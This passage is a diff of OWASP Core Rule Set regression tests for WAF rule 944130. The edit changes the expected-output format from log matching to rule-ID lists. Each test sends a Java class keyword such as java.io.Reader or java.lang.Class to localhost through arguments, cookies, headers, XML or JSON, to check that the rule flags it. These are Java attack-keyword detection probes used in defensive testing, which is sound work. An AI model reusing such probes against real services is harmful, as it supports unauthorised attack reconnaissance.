+ dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.Reader" + output: + log: + expect_ids: [944130] + - test_id: 244 desc: "Argument name includes keyword java.io.Reader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.Reader=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-245 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.Reader=test" + output: + log: + expect_ids: [944130] + - test_id: 245 desc: "Cookie test includes keyword java.io.Reader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.Reader - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-246 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.Reader + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 246 desc: "Cookie name includes keyword java.io.Reader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.Reader=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-247 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.Reader=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 247 desc: "Request header test includes keyword java.io.Reader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.Reader - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-248 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.Reader + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 248 desc: "XML attribute value includes keyword java.io.Reader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-249 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 249 desc: "XML element value includes keyword java.io.Reader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.Reader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-250 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.Reader" + output: + log: + expect_ids: [944130] + - test_id: 250 desc: "Nested XML element value includes keyword java.io.Reader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.Reader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-251 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.Reader" + output: + log: + expect_ids: [944130] + - test_id: 251 desc: "Content-Type text/plain includes keyword java.io.Reader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.Reader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-252 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.Reader" + output: + log: + expect_ids: [944130] + - test_id: 252 desc: "Content-Type application/json arg value includes keyword java.io.Reader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.Reader\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-253 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.Reader\"}" + output: + log: + expect_ids: [944130] + - test_id: 253 desc: "Content-Type application/json arg name includes keyword java.io.Reader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.Reader\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-254 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.Reader\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 254 desc: "Argument test includes keyword java.io.StringReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.StringReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-255 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.StringReader" + output: + log: + expect_ids: [944130] + - test_id: 255 desc: "Argument name includes keyword java.io.StringReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.StringReader=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-256 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.StringReader=test" + output: + log: + expect_ids: [944130] + - test_id: 256 desc: "Cookie test includes keyword java.io.StringReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.StringReader - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-257 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.StringReader + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 257 desc: "Cookie name includes keyword java.io.StringReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.StringReader=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-258 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.StringReader=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 258 desc: "Request header test includes keyword java.io.StringReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.StringReader - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-259 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.StringReader + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 259 desc: "XML attribute value includes keyword java.io.StringReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-260 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 260 desc: "XML element value includes keyword java.io.StringReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.StringReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-261 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.StringReader" + output: + log: + expect_ids: [944130] + - test_id: 261 desc: "Nested XML element value includes keyword java.io.StringReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.StringReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-262 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.StringReader" + output: + log: + expect_ids: [944130] + - test_id: 262 desc: "Content-Type text/plain includes keyword java.io.StringReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.StringReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-263 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.StringReader" + output: + log: + expect_ids: [944130] + - test_id: 263 desc: "Content-Type application/json arg value includes keyword java.io.StringReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.StringReader\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-264 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.StringReader\"}" + output: + log: + expect_ids: [944130] + - test_id: 264 desc: "Content-Type application/json arg name includes keyword java.io.StringReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.StringReader\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-265 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.StringReader\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 265 desc: "Argument test includes keyword java.lang.Class" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.Class" - output: - log_contains: "id \"944130\"" - - test_title: 944130-266 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.Class" + output: + log: + expect_ids: [944130] + - test_id: 266 desc: "Argument name includes keyword java.lang.Class" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.Class=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-267 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.Class=test" + output: + log: + expect_ids: [944130] + - test_id: 267 desc: "Cookie test includes keyword java.lang.Class" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.lang.Class - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-268 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.Class + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 268 desc: "Cookie name includes keyword java.lang.Class" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.lang.Class=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-269 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.Class=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 269 desc: "Request header test includes keyword java.lang.Class" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.lang.Class - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-270 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.Class + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 270 desc: "XML attribute value includes keyword java.lang.Class" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-271 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 271 desc: "XML element value includes keyword java.lang.Class" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.Class" - output: - log_contains: "id \"944130\"" - - test_title: 944130-272 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: 